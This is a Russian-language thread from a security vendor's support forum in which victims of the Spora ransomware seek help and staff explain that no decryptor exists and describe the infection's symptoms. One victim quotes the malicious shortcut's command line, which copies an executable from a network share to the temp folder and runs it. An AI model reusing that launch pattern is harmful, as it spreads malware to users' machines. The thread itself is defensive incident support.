Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
Попались на данный шифровальщик (шифрует файлы microsoft office: doc, docx, xls, xlsx) Может кто с ним сталкивался - возможно ли расшифровать файлы без оплаты ?
расшифровки файлов, зашифрованных данным вариантом шифратора Spora на текущий момент нет. Восстановление документов возможно в данный момент только из архивных или теневых копий.
добавьте на форум в ваше сообщение несколько зашифрованных документов.
если нет архивных копий, сохраните важные документы на отдельный носитель, возможно в будущем расшифровка документов станет возможной.
santy написал: анализ файла автозагрузки актуален и для вас. чтобы в системе не осталось активных тел шифратора. все сообщения будут перенесены в общую тему по данному шифратору.
Пришел ответ, что на данный момент спора - новый вирус, и дешифратора нет. Значит, будем ждать. Также отправил ответом на почту все запрошенные вчерашним письмом документы: - 10 примеров документов - Тело вируса в архиве с паролем infected - Образ автозагрузки сделанный ПО в вашей подписи - key файл, созданный вирусом Буду периодически проверять почту и данную тему, может со временем найдется решение
собственно, после завершения шифрования в автозапуске остается только html-записка о выкупе (не представляет угрозы).
по очистке системы выполните:
выполняем скрипт в uVS: - скопировать содержимое кода в буфер обмена; - стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена; - закрываем все браузеры перед выполнением скрипта; при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
перезагрузка, пишем о старых и новых проблемах. ------------ расшифровка в данном случае, (как и с VAULT) видимо, возможна в том случае, если будет получен доступ к приватным ключам мошенников.
Здравствуйте! Словили странный шифровальщик. Ни чего не требует, расширение не менялось, ни каких текстовых файлов с содержанием нет. Файлы офиса и медиа не открываются. Чем сможете помочь? Пример зашифрованного файла:
Denis Afanaseyev, добавьте образ автозапуска системы
если сохранился источник шифратора: ссылка, или вложение из электронного сообщения - вышлите в почту [email protected] в архиве rar, с паролем infected
судя по образу, каких то следов шифрования, работы шифратора (уже) нет.
globe3 не подошел?
если сохранился источник шифратора: ссылка, или вложение из электронного сообщения - вышлите в почту [email protected] в архиве rar, с паролем infected
Создались ярлыки вместо папок папки скрылись, содержимое папок не открывается. Расширения стандартные. в ярлыках пути такие C:\Windows\system32\cmd.exe /c explorer.exe "\\PARIZH_SERVER\Документы\itmaster" & type "\\PARIZH_SERVER\Документы\0b42f998-8c83-9c3e-bbc6-fda4f022ba24.exe" > "%tmp%\0b42f998-8c83-9c3e-bbc6-fda4f022ba24.exe" & start "\\PARIZH_SERVER\Документы\itmaster" "%tmp% Сам файл прикреплен
угу, теперь понятно что это. это Spora.
собственно, скрытие папок в корне диска - один из симптомов Spora. Второй признак, это создание ярлыков, с запуском файлика Spora. третий признак - это шифрование файла без изменения расширения. трудно сказать почему не вышло html сообщение от Spora, возможно процесс шифрования не был завершен.
проверьте так же карантин установленного антивируса. что там есть, а так же примерно вот такие файлы: RU58B-*****-RTXTX-****-TXHYY.HTML RU58B-*****-RTXTX-****-TXHYY.KEY RU58B-*****-RTXTX-****-TXHYY.LST ---------- ваш вложенный файл пока скрыл из ленты сообщений.
ESET-NOD32 Win32/Filecoder.Spora.A 20170118
вообще, файл отправлен на VT два дня назад, должен был попасть в сигнатуры. First submission 2017-01-16 05:35:58 UTC (2 дней, 1 час назад) + добавьте лог журнала обнаружения угроз:
-------- расшифровка по SPora в настоящее время в антивирусных компаниях невозможна.
(Не очень) добрый день. поймали сегодня этот же шивровальщик. ухнулись все документы. антивирусник промолчал. и при проверке вирусного ЕХЕ-шника тоже молчит утилита от ВЕБера только определяет его как Trojan.Inject2.41264 Имею пока в наличии и само исходное письмо, и результаты его действия файлы .HTA .EXE .HTML .LST .KEY могу достать зашифрованный и не зашифрованный документ.
есть ли какие действующие лекарства от данной гадости? и главное есть ли - способ вернуть документы?